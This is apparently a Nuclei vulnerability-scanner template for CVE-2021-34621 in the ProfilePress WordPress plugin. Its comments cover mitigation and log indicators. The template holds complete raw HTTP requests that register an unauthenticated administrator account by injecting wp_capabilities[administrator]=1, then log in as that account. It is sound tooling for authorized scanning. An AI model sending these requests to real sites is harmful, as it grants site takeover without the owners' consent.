# Nuclei template for CVE-2021-34621 (ProfilePress / wp-user-avatar plugin for WordPress).
# What it verifies: the plugin's AJAX signup handler (action=pp_ajax_signup) accepts a
# client-supplied wp_capabilities[administrator]=1 field, so an unauthenticated registration
# yields an administrator account. The template then logs in as that account and checks for
# the dashboard to confirm the privilege level actually granted.
# Side effects: a successful run CREATES an administrator user on the target with randomized
# credentials; this is not a passive check. Record the generated username/email and remove the
# account once an authorized scan is complete.
# Mitigation / detection: update the plugin to a fixed release (see the Wordfence reference
# below) and review the WordPress user list for unexpected administrator accounts; requests to
# admin-ajax.php with action=pp_ajax_signup that carry wp_capabilities[...] fields are a useful
# log indicator.
id: CVE-2021-34621

info:
  name: WordPress ProfilePress wp-user-avatar plugin make admin users
  author: 0xsapra
  severity: critical
  reference: https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin
  tags: cve,cve2021,wordpress,wp-plugin

# Three requests run in order; cookie-reuse (below) carries the login cookies from step 2
# into step 3.
#   1. POST admin-ajax.php: register through pp_ajax_signup with wp_capabilities[administrator]=1.
#   2. POST wp-login.php: authenticate as the account just created (relies on {{randstr}}
#      expanding to the same value as in step 1; the password is the same string as the email).
#   3. GET /wp-admin/: an administrator dashboard response satisfies both matchers.
# NOTE(review): _wp_http_referer (/wp/?page_id=18) and signup_form_id (1) are hard-coded —
# presumably copied from the original capture the template was built from.
requests:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
        Accept: application/json, text/javascript, */*; q=0.01
        X-Requested-With: XMLHttpRequest
        Content-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}
        Connection: close

        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_username"

        {{randstr}}
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_email"

        {{randstr}}@example.com
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_password"

        {{randstr}}@example.com
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_password_present"

        true
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_first_name"

        {{randstr}}@example.com
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="reg_last_name"

        {{randstr}}@example.com
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="_wp_http_referer"

        /wp/?page_id=18
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="pp_current_url"

        {{BaseURL}}
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="wp_capabilities[administrator]"

        1
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="signup_form_id"

        1
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="signup_referrer_page"


        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="action"

        pp_ajax_signup
        -----------------------------138742543134772812001999326589
        Content-Disposition: form-data; name="melange_id"


        -----------------------------138742543134772812001999326589--

      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
        Accept: application/json, text/javascript, */*; q=0.01
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}
        Connection: close

        log={{randstr}}@example.com&pwd={{randstr}}@example.com&wp-submit=Log+In

      - |
        GET /wp-admin/ HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Connection: close

    # Session cookies set by the wp-login.php response are sent with the /wp-admin/ request.
    cookie-reuse: true
    # Both matchers must hit: dashboard welcome text in the body AND HTTP 200 on the last response.
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Welcome to your WordPress Dashboard"
      - type: status
        status:
          - 200